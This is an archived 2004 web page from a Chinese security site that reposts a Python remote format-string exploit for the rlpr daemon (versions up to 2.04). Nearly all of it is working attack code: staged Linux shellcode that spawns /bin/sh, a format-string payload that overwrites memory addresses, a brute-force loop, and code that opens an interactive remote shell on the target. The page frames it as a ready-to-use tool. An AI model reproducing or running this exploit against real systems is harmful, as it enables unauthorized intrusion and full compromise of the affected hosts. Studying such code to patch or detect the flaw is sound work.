首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Rlpr <=2.04 msg() Remote format string Exploit
来源:vfocus.net 作者:jaguar 发布时间:2004-06-28  

Rlpr <=2.04 msg() Remote format string Exploit

# by jaguar
#!/usr/bin/python
import os, sys, socket, struct, time, telnetlib

class rlprd:
fd = None
pad = 2

#00000000 31DB xor ebx,ebx
#00000002 F7E3 mul ebx
#00000004 B003 mov al,0x3
#00000006 80C304 add bl,0x4
#00000009 89E1 mov ecx,esp
#0000000B 4A dec edx
#0000000C CC int3
#0000000D CD80 int 0x80
#0000000F FFE1 jmp ecx

# read(4, esp, -1); jmp ecx
lnx_readsc = "\x31\xdb\xf7\xe3\xb0\x03\x80\xc3\x04\x89\xe1\x4a\xcd\x80\xff\xe1"
lnx_stage_one = "\x90" * (23 - len(lnx_readsc)) + lnx_readsc
# dup2 shellcode(4->0,1,2)
lnx_stage_two = "\x31\xc0\x89\xc3\x89\xc1\x89\xc2\xb2\x3f\x88\xd0\xb3\x04"
lnx_stage_two += "\xcd\x80\x89\xd0\x41\xcd\x80\x89\xd0\x41\xcd\x80"
# execute /bin/sh
lnx_stage_two += "\x90" * 100
lnx_stage_two += "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68"
lnx_stage_two += "\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89"
lnx_stage_two += "\xe1\x8d\x42\x0b\xcd\x80"

targets = [ [ 0 ], [ "Compiled test platform", 0x0804c418, 0xbffff9e8 ] ]

bruteforce = 0

def __init__(self, host, os, target, port=7290):
self.host = host
self.port = port

set = 0
if(os == "linux"):
set = 1
self.stage_one = self.lnx_stage_one
self.stage_two = self.lnx_stage_two

if(set == 0):
print "Unknown OS"
os._exit()

self.os = os

if(target == 0):
self.bruteforce = 1
else:
self.args = self.targets[target]

def wl16(self, write_byte):
write_byte += 0x10000
self.already_written %= 0x10000
padding = (write_byte - self.already_written) % 0x10000
if(padding < 10):
padding += 0x10000

self.already_written += padding

return padding

def connect(self):
#if self.fd is not None:
# self.fd.close()
# self.fd = None

self.fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
self.fd.connect((self.host, self.port))

def exploit(self, where, what):
if(not self.fd or self.fd is None): self.connect()
self.already_written = len('gethostbyname(')

#print "# of nops: %d\n" % (23 - len(self.readsc))

exploit = "x" * self.pad
self.already_written += self.pad

exploit += struct.pack("<l", where)
exploit += struct.pack("<l", where + 2)
self.already_written += 8

l = self.wl16(what & 0xffff)
fill = "%1$" + str(l) + "u"
exploit += fill

exploit += "%7$hn"

l = self.wl16(what >> 16)
fill = "%1$" + str(l) + "u"
exploit += fill

exploit += "%8$hn"

#print "[*] Format string: (%s) Len: %d" % (exploit, len(exploit))
#print "[*] Stage 1 length: %d" % len(self.stage_one)

#time.sleep(5)
try:
self.fd.send(exploit + self.stage_one + "\n")
self.fd.send(self.stage_two)
time.sleep(1)
self.fd.send("echo spawned; uname -a; id -a;\n")
print "Recieved: " + self.fd.recv(1024)
except:
self.fd.close()
self.fd = None
print "\tFailed @ 0x%08x" % what
return 0

remote = telnetlib.Telnet()
remote.sock = self.fd
print "[*] You should now have a shell"
remote.interact()
os.exit(0)

def force(self, where, high, lo):
for i in range(high, lo, -8):
r.exploit(where, i)

def run(self):
if(self.bruteforce):
print "Bruteforcing.."
#print "not implemented yet"
#os._exit(1)
for i in range(0x0804c000, 0x0804d000, 0x100 / 6):
print "Trying: 0x%08x" % i
self.force(i, 0xbffffa00, 0xbffff9c0)

#self.exploit(self.args[1], self.args[2])

if __name__ == '__main__':
if(len(sys.argv) != 4):
print "%s host [linux] targetid"
print "- 0 to brute force"
print "- 1 custom compile"
os._exit(0)

print "%s-%s-%s" % (sys.argv[1], sys.argv[2], sys.argv[3])
r = rlprd(sys.argv[1], sys.argv[2], int(sys.argv[3]))
#r.exploit(0x0804c418, 0xbffff9e8)
#r.force(0x0804c418, 0xbffffa00, 0xbffff800)
r.run()



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PoC poisoning cache attack SEF
·Windows XP UPNP exploit
·Remote D.O.S WinAgents TFTP Se
·MPlayer GUI filename handling
·Ircd-Hybrid-7/Ircd-Ratbox Low-
·phpMyAdmin PHP Code Injection
·c/s型asp木马
·FreeBSD Local DoS Exploit
·serv-u本地权限提升工具
·Microsoft IE Remote Applicatio
·ASP版SQLSERVER注射数据表结构猜
·MySQL Authentication Bypass Ex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved